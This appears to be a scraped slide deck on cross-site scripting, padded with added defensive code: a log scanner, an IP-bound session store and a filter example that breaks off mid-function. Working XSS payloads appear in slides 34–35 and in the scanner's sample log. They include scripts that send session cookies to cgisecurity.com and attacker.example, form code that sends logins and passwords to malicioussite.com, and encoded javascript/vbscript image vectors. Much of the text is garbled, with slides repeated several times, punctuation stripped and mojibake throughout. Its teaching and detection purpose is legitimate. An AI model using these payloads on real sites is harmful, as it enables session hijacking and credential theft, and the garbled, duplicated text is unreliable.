• <img src=vbscript:do%63ument.lo%63ation=http://ab.com>
• <IMG SRC="javascript:alert('test')">
• <IMG SRC="javasc ript:alert('test')">

35

Types of information leakage

Client can reveal cookies to a 3rd party (session state, order info, etc.):

http://host/a.php?variable="><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?'%20+document.cookie</script>

Client can reveal posted form items to a 3rd party (userID, passwd, etc.):

<form> action="logoninformation.jsp" method="post" onsubmit="hackImg=new Image; hackImg.src='http://www.malicioussite.com/'+document.forms(1).login.value+':'+document.forms(1).password.value;" </form>

Client can be tricked into accessing/posting spoofed info to a trusted server:

www.trustedserver.com/xss.asp?name=<iframe src="http://www.trustedserver.com/auth_area/orderupdate?items=4000"></iframe>
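
A defender-side counterpart to slides 34 and 35, added here and not part of the original presentation: a scanner over web-server access logs that undoes the encoding tricks listed above (percent-encoding, HTML entities, tabs inside keywords, case) before matching, so that the naive keyword filter slide 34 calls useless becomes a usable detection. The log lines, hostnames and pattern names are constructed for the example.

```javascript
// Added example (not from the original slides): normalise-then-match
// detection of XSS payloads in request URLs taken from "combined" log lines.

function decodeEntities(s) {
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => String.fromCharCode(parseInt(d, 10)))
    .replace(/&lt;/gi, '<').replace(/&gt;/gi, '>')
    .replace(/&quot;/gi, '"').replace(/&amp;/gi, '&');
}

// Canonical form: percent-decode until stable (catches double encoding such
// as %2563), decode HTML entities, drop the tab/newline/NUL bytes browsers
// ignore inside "javasc<TAB>ript:", then case-fold.
function normalise(raw) {
  let s = raw;
  for (let i = 0; i < 3; i++) {
    let d;
    try { d = decodeURIComponent(s); } catch (e) { d = s; }
    if (d === s) break;
    s = d;
  }
  s = decodeEntities(s);
  s = s.replace(/[\t\r\n\0]/g, '');
  return s.toLowerCase();
}

// Patterns are matched against the normalised form only.
const PATTERNS = [
  { name: 'script-tag',       re: /<\s*script/ },
  { name: 'js-url',           re: /javascript\s*:/ },
  { name: 'vbscript-url',     re: /vbscript\s*:/ },
  { name: 'event-handler',    re: /\bon[a-z]+\s*=/ },
  { name: 'cookie-exfil',     re: /document\.cookie/ },
  { name: 'location-rewrite', re: /document\.location|window\.location/ },
];

// Pull the request target out of an Apache/nginx "combined" log line.
function requestTarget(line) {
  const m = line.match(/"(?:GET|POST|HEAD|PUT|DELETE|OPTIONS)\s+(\S+)\s+HTTP\/[\d.]+"/);
  return m ? m[1] : null;
}

// Names of the patterns that fire for one log line (empty array if none).
function scanLine(line) {
  const target = requestTarget(line);
  if (!target) return [];
  const norm = normalise(target);
  return PATTERNS.filter((p) => p.re.test(norm)).map((p) => p.name);
}

// Constructed sample log (not real traffic). Line 2 is the cookie-stealing
// URL from slide 35 as a browser would send it; line 3 hides "document" and
// "location" behind %63 (the slide-34 trick) and puts a tab inside
// "javascript:"; lines 1 and 4 are benign (line 4 even contains "cookie").
const SAMPLE_LOG = [
  '10.0.0.5 - - [10/Oct/2000:13:55:36 -0700] "GET /index.html HTTP/1.0" 200 2326 "-" "Mozilla/4.0"',
  '10.0.0.5 - - [10/Oct/2000:13:56:01 -0700] "GET /a.php?variable=%22%3E%3Cscript%3Edocument.location=%27http://attacker.example/cgi-bin/cookie.cgi?%27%20+document.cookie%3C/script%3E HTTP/1.0" 200 512 "-" "Mozilla/4.0"',
  '10.0.0.7 - - [10/Oct/2000:13:57:12 -0700] "GET /xss.asp?name=%3Cimg%20src=javasc%09ript:do%63ument.lo%63ation=%27http://ab.example%27%3E HTTP/1.0" 200 512 "-" "Mozilla/4.0"',
  '10.0.0.9 - - [10/Oct/2000:13:58:44 -0700] "GET /search?q=cookie+recipes HTTP/1.0" 200 8890 "-" "Mozilla/4.0"',
];

// Report: 1-based line number plus the patterns that fired, for hits only.
function scanLog(lines) {
  return lines
    .map((line, i) => ({ line: i + 1, hits: scanLine(line) }))
    .filter((r) => r.hits.length > 0);
}
```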

36

YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES:

1. http://www.cgisecurity.com/archive/php/phpNuke_cross_site_scripting.txt

2. http://www.cgisecurity.com/archive/php/phpNuke_CSS_5_holes.txt

3. http://www.cgisecurity.com/archive/php/phpNuke_2_more_CSS_holes.txt

37

Related vulnerabilities

Several classes of vulnerabilities or attack techniques are related to XSS: cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege [31]. HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on the HTTP protocol level (in addition to enabling attacks such as HTTP response splitting) [32].

Cross-site request forgery (CSRF/XSRF) is almost the opposite of XSS, in that rather than exploiting the user's trust in a site, the attacker (and his malicious page) exploits the site's trust in the client software, submitting requests that the site believes represent conscious and intentional actions of authenticated users [33].

Lastly, SQL injection exploits a vulnerability in the database layer of an application. When user input is incorrectly filtered, any SQL statements can be executed by the application.

  • Slide 1
  • Dynamic content
  • Slide 3
  • Cross Site Scripting
  • Slide 5
  • Causes
  • Threats helliphelliphelliphelliphellip
  • How it is performed
  • Slide 9
  • Slide 10
  • Slide 11
  • Persistenthellip
  • Slide 13
  • Scripting Via Malicious Linkhellip
  • In this scenario the attacker sends a specially crafted e-mai
  • Slide 16
  • If any part of the Web site uses cookies then it may be possib
  • Sending an Unauthorized Request
  • In this scenario the user unknowingly executes scripts written
  • By Scripting
  • Slide 21
  • Some FACTS about the XSS attackshelliphelliphellip
  • By SURVEYhelliphelliphellip
  • Slide 24
  • Dynamic XSS with 2way comms
  • Slide 26
  • Slide 27
  • Slide 28
  • Filtering
  • Cookie Security
  • Disabling Scriptshellip
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
Page 25: Internet hacking presentation

Dynamic XSS with 2way commsVictim Browser

XSS against site

IFRAME

Script commands run here

Other documents on site loaded into here

ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt

XSS Vulnerable Server

Attacker System

New jscripthellip

ltscript src=ldquoattackercomrdquogt

26

Some prominent sites that have been affected in the past arehelliphellip

The search engine Google The email services of Google and

Yahoo The social networking sites Facebook

MySpace and Orkut The developers of MediaWiki have

fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users

Researchers have claimed that as many as 68 of websites are likely open to XSS attacks

27

By seeing all this the question that arises ishelliphellip

Then how can we prevent it

28

Yes some methods are there for

prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption

29

Filtering

One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner

30

Cookie Security

Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie

31

Disabling Scriptshellip

Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis

Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip

Prblms wid thishellip Substantial reduction in functionality and

responsiveness Many sites do not work without client-side

scripting forcing users to disable protection for that site and opening their systems to the threat

32

The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content

33

For explaining Purpose

Remember the syntaxhellip

34

SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt

35

Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)

httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt

Client can reveal posted form items to 3rd party (userIDpasswd etc)

ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt

Client can be tricked into accessingposting spoofed info to trusted server

wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt

36

YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES

1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt

2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt

3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt

37

Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]

Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]

Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application

  • Slide 1
  • Dynamic content
  • Slide 3
  • Cross Site Scripting
  • Slide 5
  • Causes
  • Threats helliphelliphelliphelliphellip
  • How it is performed
  • Slide 9
  • Slide 10
  • Slide 11
  • Persistenthellip
  • Slide 13
  • Scripting Via Malicious Linkhellip
  • In this scenario the attacker sends a specially crafted e-mai
  • Slide 16
  • If any part of the Web site uses cookies then it may be possib
  • Sending an Unauthorized Request
  • In this scenario the user unknowingly executes scripts written
  • By Scripting
  • Slide 21
  • Some FACTS about the XSS attackshelliphelliphellip
  • By SURVEYhelliphelliphellip
  • Slide 24
  • Dynamic XSS with 2way comms
  • Slide 26
  • Slide 27
  • Slide 28
  • Filtering
  • Cookie Security
  • Disabling Scriptshellip
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
Page 26: Internet hacking presentation

26

Some prominent sites that have been affected in the past arehelliphellip

The search engine Google The email services of Google and

Yahoo The social networking sites Facebook

MySpace and Orkut The developers of MediaWiki have

fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users

Researchers have claimed that as many as 68 of websites are likely open to XSS attacks

27

By seeing all this the question that arises ishelliphellip

Then how can we prevent it

28

Yes some methods are there for

prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption

29

Filtering

One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner

30

Cookie Security

Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie

31

Disabling Scriptshellip

Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis

Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip

Prblms wid thishellip Substantial reduction in functionality and

responsiveness Many sites do not work without client-side

scripting forcing users to disable protection for that site and opening their systems to the threat

32

The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content

33

For explaining Purpose

Remember the syntaxhellip

34

SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt

35

Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)

httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt

Client can reveal posted form items to 3rd party (userIDpasswd etc)

ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt

Client can be tricked into accessingposting spoofed info to trusted server

wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt

36

YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES

1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt

2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt

3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt

37

Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]

Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]

Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application

  • Slide 1
  • Dynamic content
  • Slide 3
  • Cross Site Scripting
  • Slide 5
  • Causes
  • Threats helliphelliphelliphelliphellip
  • How it is performed
  • Slide 9
  • Slide 10
  • Slide 11
  • Persistenthellip
  • Slide 13
  • Scripting Via Malicious Linkhellip
  • In this scenario the attacker sends a specially crafted e-mai
  • Slide 16
  • If any part of the Web site uses cookies then it may be possib
  • Sending an Unauthorized Request
  • In this scenario the user unknowingly executes scripts written
  • By Scripting
  • Slide 21
  • Some FACTS about the XSS attackshelliphelliphellip
  • By SURVEYhelliphelliphellip
  • Slide 24
  • Dynamic XSS with 2way comms
  • Slide 26
  • Slide 27
  • Slide 28
  • Filtering
  • Cookie Security
  • Disabling Scriptshellip
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
Page 27: Internet hacking presentation

27

By seeing all this the question that arises ishelliphellip

Then how can we prevent it

28

Yes some methods are there for

prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption

29

Filtering

One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner

30

Cookie Security

Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie

31

Disabling Scriptshellip

Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis

Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip

Prblms wid thishellip Substantial reduction in functionality and

responsiveness Many sites do not work without client-side

scripting forcing users to disable protection for that site and opening their systems to the threat

32

The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content

33

For explaining Purpose

Remember the syntaxhellip

34

SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt

35

Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)

httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt

Client can reveal posted form items to 3rd party (userIDpasswd etc)

ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt

Client can be tricked into accessingposting spoofed info to trusted server

wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt

36

YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES

1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt

2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt

3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt

37

Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]

Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]

Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application

  • Slide 1
  • Dynamic content
  • Slide 3
  • Cross Site Scripting
  • Slide 5
  • Causes
  • Threats helliphelliphelliphelliphellip
  • How it is performed
  • Slide 9
  • Slide 10
  • Slide 11
  • Persistenthellip
  • Slide 13
  • Scripting Via Malicious Linkhellip
  • In this scenario the attacker sends a specially crafted e-mai
  • Slide 16
  • If any part of the Web site uses cookies then it may be possib
  • Sending an Unauthorized Request
  • In this scenario the user unknowingly executes scripts written
  • By Scripting
  • Slide 21
  • Some FACTS about the XSS attackshelliphelliphellip
  • By SURVEYhelliphelliphellip
  • Slide 24
  • Dynamic XSS with 2way comms
  • Slide 26
  • Slide 27
  • Slide 28
  • Filtering
  • Cookie Security
  • Disabling Scriptshellip
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
Page 28: Internet hacking presentation

28

Yes some methods are there for

prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption

29

Filtering

One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner

30

Cookie Security

Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie

31

Disabling Scriptshellip

Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis

Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip

Prblms wid thishellip Substantial reduction in functionality and

responsiveness Many sites do not work without client-side

scripting forcing users to disable protection for that site and opening their systems to the threat

32

The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content

33

For explaining Purpose

Remember the syntaxhellip

34

SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt

35

Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)

httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt

Client can reveal posted form items to 3rd party (userIDpasswd etc)

ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt

Client can be tricked into accessingposting spoofed info to trusted server

wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt

36

YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES

1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt

2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt

3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt

37

Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]

Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]

Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application

  • Slide 1
  • Dynamic content
  • Slide 3
  • Cross Site Scripting
  • Slide 5
  • Causes
  • Threats helliphelliphelliphelliphellip
  • How it is performed
  • Slide 9
  • Slide 10
  • Slide 11
  • Persistenthellip
  • Slide 13
  • Scripting Via Malicious Linkhellip
  • In this scenario the attacker sends a specially crafted e-mai
  • Slide 16
  • If any part of the Web site uses cookies then it may be possib
  • Sending an Unauthorized Request
  • In this scenario the user unknowingly executes scripts written
  • By Scripting
  • Slide 21
  • Some FACTS about the XSS attackshelliphelliphellip
  • By SURVEYhelliphelliphellip
  • Slide 24
  • Dynamic XSS with 2way comms
  • Slide 26
  • Slide 27
  • Slide 28
  • Filtering
  • Cookie Security
  • Disabling Scriptshellip
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
Page 29: Internet hacking presentation

29

Filtering

One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner

30

Cookie Security

Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie

31

Disabling Scriptshellip

Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis

Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip

Prblms wid thishellip Substantial reduction in functionality and

responsiveness Many sites do not work without client-side

scripting forcing users to disable protection for that site and opening their systems to the threat

32

The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content

33

For explaining Purpose

Remember the syntaxhellip

34

SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt

35

Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)

httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt

Client can reveal posted form items to 3rd party (userIDpasswd etc)

ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt

Client can be tricked into accessingposting spoofed info to trusted server

wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt

36

YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES

1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt

2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt

3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt

37

Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]

Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]

Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application

Page 30: Internet hacking presentation

30

Cookie Security

Many web applications rely on session cookies for authentication between individual HTTP requests, and because client-side scripts generally have access to these cookies, simple XSS exploits can steal them. To mitigate this particular threat, many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie.
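The IP-binding mitigation the slide describes, as an added example that is not part of the presentation: a small in-memory session store that records the login IP and refuses the cookie from any other address, plus the Set-Cookie header a server would emit. The store, the key and the IP addresses are constructed for the demo; the HttpOnly flag is an addition of mine, not something the slide mentions.

```python
import hmac
import secrets
from http.cookies import SimpleCookie


class SessionStore:
    """In-memory session store that binds each session id to the client IP
    that created it (added example; the deck only describes the idea)."""

    def __init__(self):
        self._sessions = {}  # session_id -> {"user": ..., "ip": ...}

    def create(self, user, client_ip):
        # A fresh, unguessable session id per login; the IP is stored beside it.
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": user, "ip": client_ip}
        return sid

    def lookup(self, sid, client_ip):
        """Return the user for this session only if the request comes from the
        IP that logged in. A cookie stolen via XSS and replayed from another
        address therefore yields None instead of a live session."""
        entry = self._sessions.get(sid)
        if entry is None or not hmac.compare_digest(entry["ip"], client_ip):
            return None
        return entry["user"]


def set_cookie_header(sid):
    """Build the Set-Cookie header for the session id.

    HttpOnly is not on the slide: it is the standard flag that hides the cookie
    from document.cookie, which removes the leak the slide warns about. Secure
    keeps the cookie off plaintext HTTP."""
    cookie = SimpleCookie()
    cookie["SESSIONID"] = sid
    cookie["SESSIONID"]["httponly"] = True
    cookie["SESSIONID"]["secure"] = True
    cookie["SESSIONID"]["path"] = "/"
    return cookie.output(header="Set-Cookie:").strip()


def demonstrate():
    """Constructed scenario: alice logs in from one address, and the same
    cookie is then presented from a second address (the replay case)."""
    store = SessionStore()
    login_ip = "198.51.100.7"     # constructed: documentation address range
    attacker_ip = "203.0.113.9"   # constructed: documentation address range
    sid = store.create("alice", login_ip)
    from_owner = store.lookup(sid, login_ip)       # "alice"
    from_elsewhere = store.lookup(sid, attacker_ip)  # None
    return from_owner, from_elsewhere


if __name__ == "__main__":
    print(demonstrate())
    print(set_cookie_header("demo-session-id"))
```

Binding to the IP has a known cost: users behind a changing NAT or on mobile networks get logged out when their address changes, so it is a second line of defence next to keeping the cookie out of script reach, not a replacement for it.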

31

Disabling Scripts…

Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis.

Functionality that blocks all scripting and external inclusions by default, and then allows the user to enable it on a per-domain basis, is more effective…

Problems with this… A substantial reduction in functionality and responsiveness. Many sites do not work without client-side scripting, forcing users to disable the protection for that site and opening their systems to the threat.

32

The easiest way to protect yourself as a user is to only follow links from the main website you wish to view, and to use its search engine to find the content.

33

For explanation purposes

Remember the syntax…

34

SYNTAX: script injection in an image src tag

  • Embed nested quotes: ' or " or \u0022 \u0027
  • Keyword filters that allow any js to execute are useless: A = 'navi'; B = 'gator.userAgent'; alert(eval(A+B))
  • Limited input length + script block embed = unlimited script power (<script src=...>)
  • SSL pages warn if the script src comes from an untrusted site, but if you can upload, say, an img that is actually js commands…
  • Methods of script encoding:
    <img src="vbscript:do&#63;ument.lo&#63;ation='http://ab.com'">
    <IMG SRC="javascript:alert('test')">
    <IMG SRC="javasc&#09;ript:alert('test')">
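Why the slide calls keyword filters useless, shown from the defender's side as an added example (not part of the presentation): a blacklist that strips the literal keyword is compared with an allow-list check on the decoded attribute value and with context-correct escaping. The sample inputs are constructed from the payload forms listed on the slide; the function names are my own.

```python
import html
import re

# Constructed sample inputs, modelled on the forms listed on the slide.
SAMPLES = [
    'javascript:alert("test")',        # plain keyword
    'javasc&#09;ript:alert("test")',   # tab entity splits the keyword
    'http://ab.com/logo.png',          # a legitimate image URL
]


def naive_keyword_filter(value):
    """The kind of blacklist the slide calls useless: drop the literal keyword
    and pass everything else through unchanged."""
    return value.replace("javascript:", "")


def _normalise(value):
    """See the value the way a browser will: decode HTML entities (so &#09;
    becomes a tab) and drop the ASCII control characters and whitespace that
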